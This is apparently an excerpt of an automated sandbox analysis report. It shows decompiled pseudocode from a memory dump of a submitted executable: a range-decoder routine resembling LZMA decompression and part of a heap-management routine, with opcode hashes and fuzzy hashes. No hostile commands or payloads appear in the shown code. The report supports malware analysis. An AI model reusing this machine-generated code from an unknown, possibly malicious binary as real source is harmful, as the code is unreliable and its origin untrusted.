                              														goto L35;
                              													}
                              													_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t211 * 4));
                              													__eflags =  *((char*)(_t159 + 0x54));
                              													if( *((char*)(_t159 + 0x54)) != 0) {
                              														goto L35;
                              													}
                              													goto L34;
                              													L35:
                              													 *(_t226 + 8) =  *(_t226 + 8) + _t201;
                              													_t211 = _t211 + 1;
                              													__eflags = _t211 - _t215;
                              												} while (_t211 < _t215);
                              												L36:
                              												_t211 = 0;
                              												__eflags = 0;
                              												goto L37;
                              											}
                              										} else {
                              											goto L18;
                              										}
                              										do {
                              											L18:
                              											_t162 =  *((intOrPtr*)( *(_t184 + 0xc) + _t214 * 4));
                              											__eflags = _t162 - _t211;
                              											if(_t162 == _t211) {
                              												goto L26;
                              											}
                              											__eflags = _t162 - 1;
                              											 *(_t226 - 0x24) = _t211;
                              											 *(_t226 - 0x20) = _t211;
                              											if(_t162 <= 1) {
                              												L25:
                              												_t164 = E0040C281( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t214 * 4)));
                              												asm("sbb edx, [ebp-0x20]");
                              												E0040F953( *(_t226 + 0x10), _t164 -  *(_t226 - 0x24), _t211);
                              												_t184 =  *((intOrPtr*)(_t226 + 0xc));
                              												_t211 = 0;
                              												__eflags = 0;
                              												goto L26;
                              											}
                              											_t167 = _t162 - 1;
                              											__eflags = _t167;
                              											 *(_t226 + 8) = _t167;
                              											do {
                              												__eflags =  *(_t226 - 0x1c) - 9;
                              												if( *(_t226 - 0x1c) == 9) {
                              													__eflags =  *(_t226 - 0x18) - _t211;
                              													if( *(_t226 - 0x18) == _t211) {
                              														_t219 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
                              														E0040F953( *(_t226 + 0x10), _t219, _t211);
                              														 *(_t226 - 0x24) =  *(_t226 - 0x24) + _t219;
                              														_t214 =  *(_t226 - 0x10);
                              														asm("adc [ebp-0x20], ebx");
                              														_t175 =  *((intOrPtr*)(_t226 - 0x14));
                              														_t211 = 0;
                              														__eflags = 0;
                              													}
                              												}
                              												_t36 = _t226 + 8;
                              												 *_t36 =  *(_t226 + 8) - 1;
                              												__eflags =  *_t36;
                              											} while ( *_t36 != 0);
                              											goto L25;
                              											L26:
                              											_t214 = _t214 + 1;
                              											__eflags = _t214 -  *((intOrPtr*)(_t184 + 8));
                              											 *(_t226 - 0x10) = _t214;
                              										} while (_t214 <  *((intOrPtr*)(_t184 + 8)));
                              										goto L27;
                              									}
                              									_t220 = 0;
                              									__eflags =  *(_t223 + 8) - _t211;
                              									if( *(_t223 + 8) <= _t211) {
                              										goto L17;
                              									} else {
                              										goto L15;
                              									}
                              									do {
                              										L15:
                              										E004039DF( *((intOrPtr*)(_t226 + 0xc)), 1);
                              										_t220 = _t220 + 1;
                              										__eflags = _t220 -  *(_t223 + 8);
                              									} while (_t220 <  *(_t223 + 8));
                              									_t211 = 0;
                              									__eflags = 0;
                              									goto L17;
                              								}
                              								E0040DBE1( *((intOrPtr*)(_t175 + 0x18)), _t211);
                              								while(1) {
                              									_t133 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
                              									_t183 = _t211;
                              									 *(_t226 - 0x1c) = _t133;
                              									 *(_t226 - 0x18) = _t183;
                              									if(_t133 != 0xd) {
                              										goto L6;
                              									}
                              									goto L2;
                              								}
                              								goto L6;
                              							}
                              							__eflags = _t183 - _t211;
                              							if(_t183 == _t211) {
                              								goto L13;
                              							}
                              							goto L11;
                              						}
                              						__eflags = _t183 - _t211;
                              						if(_t183 == _t211) {
                              							goto L13;
                              						}
                              						goto L9;
                              					}
                              					_t221 = 0;
                              					if( *(_t223 + 8) <= 0) {
                              						continue;
                              					} else {
                              						goto L4;
                              					}
                              					do {
                              						L4:
                              						E004039DF( *((intOrPtr*)(_t226 + 0xc)), E0040DC90(0));
                              						_t221 = _t221 + 1;
                              					} while (_t221 <  *(_t223 + 8));
                              					continue;
                              					L6:
                              					_t211 = 0;
                              					__eflags = 0;
                              					goto L7;
                              				}
                              			}






























                              0x0040e6c8
                              0x0040e6c8
                              0x0040e6c9
                              0x0040e6cc
                              0x0040e6cc
                              0x00000000
                              0x0040e65b
                              0x0040e635
                              0x0040e637
                              0x0040e63a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e63c
                              0x0040e63c
                              0x0040e641
                              0x0040e646
                              0x0040e647
                              0x0040e647
                              0x0040e64c
                              0x0040e64c
                              0x00000000
                              0x0040e64c
                              0x0040e626
                              0x0040e5d0
                              0x0040e5d3
                              0x0040e5d8
                              0x0040e5dd
                              0x0040e5e0
                              0x0040e5e3
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e5e3
                              0x00000000
                              0x0040e5d0
                              0x0040e61b
                              0x0040e61d
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e61d
                              0x0040e612
                              0x0040e614
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e614
                              0x0040e5eb
                              0x0040e5f0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e5f2
                              0x0040e5f2
                              0x0040e5fe
                              0x0040e603
                              0x0040e604
                              0x00000000
                              0x0040e60b
                              0x0040e60b
                              0x0040e60b
                              0x00000000
                              0x0040e60b

                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: b07fb5bf97a2b1aa00d72e408e60a61c646f09191d68c079a122928f862f61c3
                              • Instruction ID: 21f6de2b17b1780f59bfe67bff07a3778763215a5d034522e7ff50d1aecbc74d
                              • Opcode Fuzzy Hash: b07fb5bf97a2b1aa00d72e408e60a61c646f09191d68c079a122928f862f61c3
                              • Instruction Fuzzy Hash: 86A1FA70E002099FCB18DF96C4919AEB7B2FFA4314F14887FE815A7291DB39AD61CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004126B0(void* __eax, signed int* __ecx) {
                              				intOrPtr _t149;
                              				unsigned int _t153;
                              				signed int _t157;
                              				signed int _t158;
                              				intOrPtr _t159;
                              				signed int _t160;
                              				signed int _t161;
                              				signed char* _t162;
                              				signed int _t164;
                              				intOrPtr _t167;
                              				signed int _t168;
                              				signed char* _t169;
                              				signed int _t171;
                              				signed char* _t179;
                              				signed int _t190;
                              				signed int _t192;
                              				signed int _t196;
                              				signed char* _t197;
                              				signed char* _t199;
                              				signed int _t204;
                              				signed short* _t205;
                              				void* _t206;
                              				signed int _t207;
                              				signed int _t215;
                              				signed int _t216;
                              				signed char* _t225;
                              				signed int _t228;
                              				signed int _t232;
                              				signed int _t235;
                              				signed int _t238;
                              				signed int _t241;
                              				signed int _t244;
                              				signed int _t247;
                              				signed char _t251;
                              				void* _t252;
                              				signed int _t265;
                              				signed int _t270;
                              				signed int _t271;
                              				signed int _t272;
                              				signed int _t278;
                              				signed char* _t279;
                              				signed int _t281;
                              				signed int _t283;
                              				signed int _t284;
                              				signed int _t285;
                              				signed int _t286;
                              				signed int _t287;
                              				signed int _t288;
                              				signed int _t289;
                              				signed int _t290;
                              				unsigned int _t291;
                              				signed int* _t292;
                              				intOrPtr _t293;
                              				signed char* _t294;
                              				signed short* _t296;
                              				signed int _t297;
                              				signed int _t298;
                              				signed int _t300;
                              				signed int _t301;
                              				signed int _t310;
                              				signed int _t314;
                              				signed int _t319;
                              				signed int _t320;
                              				signed int _t321;
                              				signed int _t322;
                              				signed int _t323;
                              				signed int _t324;
                              				signed int _t325;
                              				signed int _t340;
                              				signed int _t341;
                              				signed int _t342;
                              				signed char* _t344;
                              				void* _t351;
                              
                              				_t292 = __ecx;
                              				_t340 =  *(__ecx + 0x34);
                              				_t283 =  *(__ecx + 0x1c);
                              				_t321 =  *(__ecx + 0x20);
                              				_t149 =  *((intOrPtr*)(__ecx + 0x10));
                              				 *(_t351 + 0x10) =  &(( *(_t351 + 0x28))[__eax]);
                              				 *((intOrPtr*)(_t351 + 0x14)) = _t149;
                              				_t204 = (0x00000001 <<  *(__ecx + 8)) - 0x00000001 &  *(__ecx + 0x2c);
                              				 *(_t351 + 0x18) =  *(_t149 + ((_t340 << 4) + 1) * 2) & 0x0000ffff;
                              				if(_t283 >= 0x1000000) {
                              					L4:
                              					_t153 = (_t283 >> 0xb) *  *(_t351 + 0x18);
                              					if(_t321 >= _t153) {
                              						_t293 =  *((intOrPtr*)(_t351 + 0x14));
                              						_t225 =  *(_t351 + 0x28);
                              						_t284 = _t283 - _t153;
                              						_t322 = _t321 - _t153;
                              						 *(_t351 + 0x18) =  *(_t293 + 0x180 + _t340 * 2) & 0x0000ffff;
                              						if(_t284 >= 0x1000000) {
                              							L39:
                              							_t157 = (_t284 >> 0xb) *  *(_t351 + 0x18);
                              							if(_t322 >= _t157) {
                              								_t285 = _t284 - _t157;
                              								_t323 = _t322 - _t157;
                              								_t158 =  *(_t293 + 0x198 + _t340 * 2) & 0x0000ffff;
                              								 *(_t351 + 0x1c) = 3;
                              								if(_t285 >= 0x1000000) {
                              									L44:
                              									_t228 = (_t285 >> 0xb) * _t158;
                              									_t159 =  *((intOrPtr*)(_t351 + 0x14));
                              									if(_t323 >= _t228) {
                              										_t294 =  *(_t351 + 0x28);
                              										_t286 = _t285 - _t228;
                              										_t324 = _t323 - _t228;
                              										 *(_t351 + 0x18) =  *(_t159 + 0x1b0 + _t340 * 2) & 0x0000ffff;
                              										if(_t286 >= 0x1000000) {
                              											L55:
                              											_t232 = (_t286 >> 0xb) *  *(_t351 + 0x18);
                              											if(_t324 >= _t232) {
                              												_t160 =  *(_t159 + 0x1c8 + _t340 * 2) & 0x0000ffff;
                              												_t287 = _t286 - _t232;
                              												_t323 = _t324 - _t232;
                              												if(_t287 >= 0x1000000) {
                              													L60:
                              													_t235 = (_t287 >> 0xb) * _t160;
                              													if(_t323 >= _t235) {
                              														goto L62;
                              													} else {
                              														_t288 = _t235;
                              													}
                              													goto L63;
                              												} else {
                              													if(_t294 >=  *(_t351 + 0x10)) {
                              														goto L2;
                              													} else {
                              														_t287 = _t287 << 8;
                              														_t323 = _t323 << 0x00000008 |  *_t294 & 0x000000ff;
                              														 *(_t351 + 0x28) =  &(_t294[1]);
                              														goto L60;
                              													}
                              												}
                              											} else {
                              												_t288 = _t232;
                              												goto L63;
                              											}
                              										} else {
                              											if(_t294 >=  *(_t351 + 0x10)) {
                              												goto L2;
                              											} else {
                              												_t286 = _t286 << 8;
                              												_t324 = _t324 << 0x00000008 |  *_t294 & 0x000000ff;
                              												_t294 =  &(_t294[1]);
                              												 *(_t351 + 0x28) = _t294;
                              												goto L55;
                              											}
                              										}
                              									} else {
                              										_t314 =  *(_t159 + ((_t340 + 0xf << 4) + _t204) * 2) & 0x0000ffff;
                              										_t179 =  *(_t351 + 0x28);
                              										_t287 = _t228;
                              										if(_t228 >= 0x1000000) {
                              											L48:
                              											_t235 = (_t287 >> 0xb) * _t314;
                              											if(_t323 >= _t235) {
                              												L62:
                              												_t288 = _t287 - _t235;
                              												_t323 = _t323 - _t235;
                              												L63:
                              												_t225 =  *(_t351 + 0x28);
                              												 *(_t351 + 0x20) = 0xc;
                              												_t296 =  *((intOrPtr*)(_t351 + 0x14)) + 0xa68;
                              												goto L64;
                              											} else {
                              												if(_t235 >= 0x1000000 || _t179 <  *(_t351 + 0x10)) {
                              													return 3;
                              												} else {
                              													goto L2;
                              												}
                              											}
                              										} else {
                              											if(_t179 >=  *(_t351 + 0x10)) {
                              												goto L2;
                              											} else {
                              												_t287 = _t228 << 8;
                              												_t323 = _t323 << 0x00000008 |  *_t179 & 0x000000ff;
                              												_t179 =  &(_t179[1]);
                              												 *(_t351 + 0x28) = _t179;
                              												goto L48;
                              											}
                              										}
                              									}
                              								} else {
                              									if(_t225 >=  *(_t351 + 0x10)) {
                              										goto L2;
                              									} else {
                              										_t285 = _t285 << 8;
                              										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
                              										 *(_t351 + 0x28) =  &(_t225[1]);
                              										goto L44;
                              									}
                              								}
                              							} else {
                              								_t288 = _t157;
                              								 *(_t351 + 0x20) = 0;
                              								_t296 = _t293 + 0x664;
                              								 *(_t351 + 0x1c) = 2;
                              								L64:
                              								_t161 =  *_t296 & 0x0000ffff;
                              								if(_t288 >= 0x1000000) {
                              									L67:
                              									_t238 = (_t288 >> 0xb) * _t161;
                              									_t162 =  *(_t351 + 0x28);
                              									if(_t323 >= _t238) {
                              										_t341 = _t296[1] & 0x0000ffff;
                              										_t289 = _t288 - _t238;
                              										_t325 = _t323 - _t238;
                              										if(_t289 >= 0x1000000) {
                              											L72:
                              											_t241 = (_t289 >> 0xb) * _t341;
                              											if(_t325 >= _t241) {
                              												_t290 = _t289 - _t241;
                              												_t325 = _t325 - _t241;
                              												_t205 =  &(_t296[0x102]);
                              												_t342 = 0x10;
                              												 *(_t351 + 0x18) = 0x100;
                              											} else {
                              												_t342 = 8;
                              												_t290 = _t241;
                              												_t205 = _t296 + 0x104 + (_t204 + _t204) * 8;
                              												 *(_t351 + 0x18) = 8;
                              											}
                              											goto L75;
                              										} else {
                              											if(_t162 >=  *(_t351 + 0x10)) {
                              												goto L2;
                              											} else {
                              												_t289 = _t289 << 8;
                              												_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
                              												_t162 =  &(_t162[1]);
                              												 *(_t351 + 0x28) = _t162;
                              												goto L72;
                              											}
                              										}
                              									} else {
                              										_t290 = _t238;
                              										_t205 = _t296 + 4 + (_t204 + _t204) * 8;
                              										_t342 = 0;
                              										 *(_t351 + 0x18) = 8;
                              										L75:
                              										_t297 = 1;
                              										L76:
                              										while(1) {
                              											if(_t290 >= 0x1000000) {
                              												L79:
                              												_t244 = (_t290 >> 0xb) * (_t205[_t297] & 0x0000ffff);
                              												if(_t325 >= _t244) {
                              													_t290 = _t290 - _t244;
                              													_t325 = _t325 - _t244;
                              													_t297 = _t297 + _t297 + 1;
                              												} else {
                              													_t290 = _t244;
                              													_t297 = _t297 + _t297;
                              												}
                              												_t164 =  *(_t351 + 0x18);
                              												if(_t297 >= _t164) {
                              													_t298 = _t297 + _t342 - _t164;
                              													if( *(_t351 + 0x20) >= 4) {
                              														goto L20;
                              													} else {
                              														if(_t298 >= 4) {
                              															_t298 = 3;
                              														}
                              														_t167 =  *((intOrPtr*)(_t351 + 0x14));
                              														_t344 =  *(_t351 + 0x28);
                              														_t128 = _t167 + 0x360; // 0x363
                              														_t206 = (_t298 << 7) + _t128;
                              														_t300 = 1;
                              														do {
                              															_t168 =  *(_t206 + _t300 * 2) & 0x0000ffff;
                              															if(_t290 >= 0x1000000) {
                              																goto L91;
                              															} else {
                              																if(_t344 >=  *(_t351 + 0x10)) {
                              																	goto L2;
                              																} else {
                              																	_t290 = _t290 << 8;
                              																	_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
                              																	_t344 =  &(_t344[1]);
                              																	goto L91;
                              																}
                              															}
                              															goto L113;
                              															L91:
                              															_t247 = (_t290 >> 0xb) * _t168;
                              															if(_t325 >= _t247) {
                              																_t290 = _t290 - _t247;
                              																_t325 = _t325 - _t247;
                              																_t300 = _t300 + _t300 + 1;
                              															} else {
                              																_t290 = _t247;
                              																_t300 = _t300 + _t300;
                              															}
                              														} while (_t300 < 0x40);
                              														_t301 = _t300 - 0x40;
                              														if(_t301 < 4) {
                              															goto L21;
                              														} else {
                              															_t251 = (_t301 >> 1) - 1;
                              															if(_t301 >= 0xe) {
                              																_t169 =  *(_t351 + 0x10);
                              																_t252 = _t251 - 4;
                              																do {
                              																	if(_t290 >= 0x1000000) {
                              																		goto L102;
                              																	} else {
                              																		if(_t344 >= _t169) {
                              																			goto L2;
                              																		} else {
                              																			_t290 = _t290 << 8;
                              																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
                              																			_t344 =  &(_t344[1]);
                              																			goto L102;
                              																		}
                              																	}
                              																	goto L113;
                              																	L102:
                              																	_t290 = _t290 >> 1;
                              																	_t325 = _t325 - ((_t325 - _t290 >> 0x0000001f) - 0x00000001 & _t290);
                              																	_t252 = _t252 - 1;
                              																} while (_t252 != 0);
                              																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x644;
                              																_t251 = 4;
                              																goto L104;
                              															} else {
                              																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x55e + (((_t301 & 0x00000001 | 0x00000002) << _t251) - _t301) * 2;
                              																L104:
                              																_t207 = 1;
                              																do {
                              																	_t171 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t207 * 2) & 0x0000ffff;
                              																	if(_t290 >= 0x1000000) {
                              																		goto L108;
                              																	} else {
                              																		if(_t344 >=  *(_t351 + 0x10)) {
                              																			goto L2;
                              																		} else {
                              																			_t290 = _t290 << 8;
                              																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
                              																			_t344 =  &(_t344[1]);
                              																			goto L108;
                              																		}
                              																	}
                              																	goto L113;
                              																	L108:
                              																	_t310 = (_t290 >> 0xb) * _t171;
                              																	if(_t325 >= _t310) {
                              																		_t290 = _t290 - _t310;
                              																		_t325 = _t325 - _t310;
                              																		_t207 = _t207 + _t207 + 1;
                              																	} else {
                              																		_t290 = _t310;
                              																		_t207 = _t207 + _t207;
                              																	}
                              																	_t251 = _t251 - 1;
                              																} while (_t251 != 0);
                              																goto L21;
                              															}
                              														}
                              													}
                              												} else {
                              													_t162 =  *(_t351 + 0x28);
                              													continue;
                              												}
                              											} else {
                              												if(_t162 >=  *(_t351 + 0x10)) {
                              													goto L2;
                              												} else {
                              													_t290 = _t290 << 8;
                              													_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
                              													 *(_t351 + 0x28) =  &(_t162[1]);
                              													goto L79;
                              												}
                              											}
                              											goto L113;
                              										}
                              									}
                              								} else {
                              									if(_t225 >=  *(_t351 + 0x10)) {
                              										goto L2;
                              									} else {
                              										_t288 = _t288 << 8;
                              										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
                              										 *(_t351 + 0x28) =  &(_t225[1]);
                              										goto L67;
                              									}
                              								}
                              							}
                              						} else {
                              							if(_t225 >=  *(_t351 + 0x10)) {
                              								goto L2;
                              							} else {
                              								_t284 = _t284 << 8;
                              								_t322 = _t322 << 0x00000008 |  *_t225 & 0x000000ff;
                              								_t225 =  &(_t225[1]);
                              								 *(_t351 + 0x28) = _t225;
                              								goto L39;
                              							}
                              						}
                              					} else {
                              						_t291 = _t153;
                              						 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0xe6c;
                              						if(_t292[0xc] != 0 || _t292[0xb] != 0) {
                              							_t265 = _t292[9];
                              							if(_t265 == 0) {
                              								_t265 = _t292[0xa];
                              							}
                              							 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + ((( *(_t292[5] + _t265 - 1) & 0x000000ff) >> 8 -  *_t292) + (((0x00000001 << _t292[1]) - 0x00000001 & _t292[0xb]) <<  *_t292)) * 0x600;
                              						}
                              						if(_t340 >= 7) {
                              							_t270 = _t292[9];
                              							_t215 = _t292[0xe];
                              							if(_t270 >= _t215) {
                              								_t190 = 0;
                              							} else {
                              								_t190 = _t292[0xa];
                              							}
                              							_t271 =  *(_t292[5] - _t215 + _t270 + _t190) & 0x000000ff;
                              							_t216 = 0x100;
                              							_t319 = 1;
                              							while(1) {
                              								_t272 = _t271 + _t271;
                              								_t192 = _t216 & _t272;
                              								 *(_t351 + 0x20) = _t272;
                              								 *(_t351 + 0x18) =  *( *((intOrPtr*)(_t351 + 0x14)) + (_t192 + _t319 + _t216) * 2) & 0x0000ffff;
                              								if(_t291 >= 0x1000000) {
                              									goto L31;
                              								}
                              								_t279 =  *(_t351 + 0x28);
                              								if(_t279 >=  *(_t351 + 0x10)) {
                              									goto L2;
                              								} else {
                              									_t291 = _t291 << 8;
                              									_t321 = _t321 << 0x00000008 |  *_t279 & 0x000000ff;
                              									 *(_t351 + 0x28) =  &(_t279[1]);
                              									goto L31;
                              								}
                              								goto L113;
                              								L31:
                              								_t278 = (_t291 >> 0xb) *  *(_t351 + 0x18);
                              								if(_t321 >= _t278) {
                              									_t290 = _t291 - _t278;
                              									_t321 = _t321 - _t278;
                              									_t319 = _t319 + _t319 + 1;
                              								} else {
                              									_t290 = _t278;
                              									_t319 = _t319 + _t319;
                              									_t192 =  !_t192;
                              								}
                              								_t216 = _t216 & _t192;
                              								if(_t319 >= 0x100) {
                              									goto L19;
                              								} else {
                              									_t271 =  *(_t351 + 0x20);
                              									continue;
                              								}
                              								goto L113;
                              							}
                              						} else {
                              							_t281 = 1;
                              							do {
                              								_t320 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t281 * 2) & 0x0000ffff;
                              								if(_t291 >= 0x1000000) {
                              									goto L15;
                              								} else {
                              									_t197 =  *(_t351 + 0x28);
                              									if(_t197 >=  *(_t351 + 0x10)) {
                              										goto L2;
                              									} else {
                              										_t291 = _t291 << 8;
                              										_t321 = _t321 << 0x00000008 |  *_t197 & 0x000000ff;
                              										 *(_t351 + 0x28) =  &(_t197[1]);
                              										goto L15;
                              									}
                              								}
                              								goto L113;
                              								L15:
                              								_t196 = (_t291 >> 0xb) * _t320;
                              								if(_t321 >= _t196) {
                              									_t291 = _t291 - _t196;
                              									_t321 = _t321 - _t196;
                              									_t281 = _t281 + _t281 + 1;
                              								} else {
                              									_t291 = _t196;
                              									_t281 = _t281 + _t281;
                              								}
                              							} while (_t281 < 0x100);
                              							L19:
                              							 *(_t351 + 0x1c) = 1;
                              							L20:
                              							_t344 =  *(_t351 + 0x28);
                              							L21:
                              							if(_t290 >= 0x1000000 || _t344 <  *(_t351 + 0x10)) {
                              								return  *(_t351 + 0x1c);
                              							} else {
                              								goto L2;
                              							}
                              						}
                              					}
                              				} else {
                              					_t199 =  *(_t351 + 0x28);
                              					if(_t199 <  *(_t351 + 0x10)) {
                              						_t283 = _t283 << 8;
                              						_t321 = _t321 << 0x00000008 |  *_t199 & 0x000000ff;
                              						 *(_t351 + 0x28) =  &(_t199[1]);
                              						goto L4;
                              					} else {
                              						L2:
                              						return 0;
                              					}
                              				}
                              				L113:
                              			}


                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                              • Instruction ID: 16771a17edc265a66ec67cf10f30b53a928448ec08439b5136306a35d4d76ba5
                              • Opcode Fuzzy Hash: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                              • Instruction Fuzzy Hash: 3D023C72A042114BD719CE18C6802BDBBE2FBD5350F150A3FE4A6D7684D7B898E8C799
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004162A6(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
                              				signed int _v8;
                              				signed char _v12;
                              				intOrPtr _v16;
                              				intOrPtr _t186;
                              				void* _t187;
                              				signed int _t188;
                              				signed int* _t189;
                              				intOrPtr _t191;
                              				signed int* _t192;
                              				signed int* _t193;
                              				signed char _t194;
                              				intOrPtr _t195;
                              				intOrPtr* _t196;
                              				signed int _t199;
                              				signed int _t202;
                              				signed int _t207;
                              				signed int _t209;
                              				signed int _t218;
                              				signed int _t221;
                              				signed int* _t222;
                              				signed int _t227;
                              				intOrPtr _t228;
                              				intOrPtr _t229;
                              				intOrPtr _t230;
                              				char _t233;
                              				signed int _t234;
                              				signed char _t235;
                              				signed int* _t237;
                              				signed int* _t239;
                              				signed int* _t244;
                              				signed int* _t245;
                              				signed char _t250;
                              				intOrPtr _t256;
                              				signed int _t257;
                              				char _t258;
                              				char _t259;
                              				signed char _t260;
                              				signed int* _t262;
                              				signed int* _t267;
                              				signed int* _t268;
                              				char* _t270;
                              				signed int _t274;
                              				unsigned int _t275;
                              				intOrPtr _t277;
                              				unsigned int _t278;
                              				intOrPtr* _t280;
                              				void* _t281;
                              				signed char _t290;
                              				signed int _t292;
                              				signed char _t295;
                              				signed int _t298;
                              				signed int _t302;
                              				signed int* _t304;
                              
                              				_t222 = _a4;
                              				_t280 = _a8;
                              				_t186 =  *((intOrPtr*)(_t222 + 0x10));
                              				_t292 = _a12 + 0x00000017 & 0xfffffff0;
                              				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
                              				_v16 = _t274 * 0x204 + _t186 + 0x144;
                              				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
                              				_a12 = _t227;
                              				_t194 =  *(_t227 + _t280 - 4);
                              				_t281 = _t227 + _t280 - 4;
                              				_v8 = _t194;
                              				if(_t292 <= _t227) {
                              					if(__eflags < 0) {
                              						_t195 = _a8;
                              						_a12 = _a12 - _t292;
                              						_t228 = _t292 + 1;
                              						 *((intOrPtr*)(_t195 - 4)) = _t228;
                              						_t196 = _t195 + _t292 - 4;
                              						_a8 = _t196;
                              						_t295 = (_a12 >> 4) - 1;
                              						 *((intOrPtr*)(_t196 - 4)) = _t228;
                              						__eflags = _t295 - 0x3f;
                              						if(_t295 > 0x3f) {
                              							_t295 = 0x3f;
                              						}
                              						__eflags = _v8 & 0x00000001;
                              						if((_v8 & 0x00000001) == 0) {
                              							_t298 = (_v8 >> 4) - 1;
                              							__eflags = _t298 - 0x3f;
                              							if(_t298 > 0x3f) {
                              								_t298 = 0x3f;
                              							}
                              							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
                              							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
                              								__eflags = _t298 - 0x20;
                              								if(_t298 >= 0x20) {
                              									_t128 = _t298 - 0x20; // -32
                              									_t130 = _t186 + 4; // 0x4
                              									_t244 = _t298 + _t130;
                              									_t199 =  !(0x80000000 >> _t128);
                              									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
                              									 *_t244 =  *_t244 - 1;
                              									__eflags =  *_t244;
                              									if( *_t244 == 0) {
                              										_t245 = _a4;
                              										_t138 = _t245 + 4;
                              										 *_t138 =  *(_t245 + 4) & _t199;
                              										__eflags =  *_t138;
                              									}
                              								} else {
                              									_t304 = _t298 + _t186 + 4;
                              									_t202 =  !(0x80000000 >> _t298);
                              									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
                              									 *_t304 =  *_t304 - 1;
                              									__eflags =  *_t304;
                              									if( *_t304 == 0) {
                              										 *_a4 =  *_a4 & _t202;
                              									}
                              								}
                              								_t196 = _a8;
                              							}
                              							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
                              							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
                              							_t302 = _a12 + _v8;
                              							_a12 = _t302;
                              							_t295 = (_t302 >> 4) - 1;
                              							__eflags = _t295 - 0x3f;
                              							if(_t295 > 0x3f) {
                              								_t295 = 0x3f;
                              							}
                              						}
                              						_t229 = _v16;
                              						_t230 = _t229 + _t295 * 8;
                              						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
                              						 *((intOrPtr*)(_t196 + 8)) = _t230;
                              						 *((intOrPtr*)(_t230 + 4)) = _t196;
                              						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
                              						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
                              						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
                              							_t233 =  *(_t295 + _t186 + 4);
                              							__eflags = _t295 - 0x20;
                              							_a11 = _t233;
                              							_t234 = _t233 + 1;
                              							__eflags = _t234;
                              							 *(_t295 + _t186 + 4) = _t234;
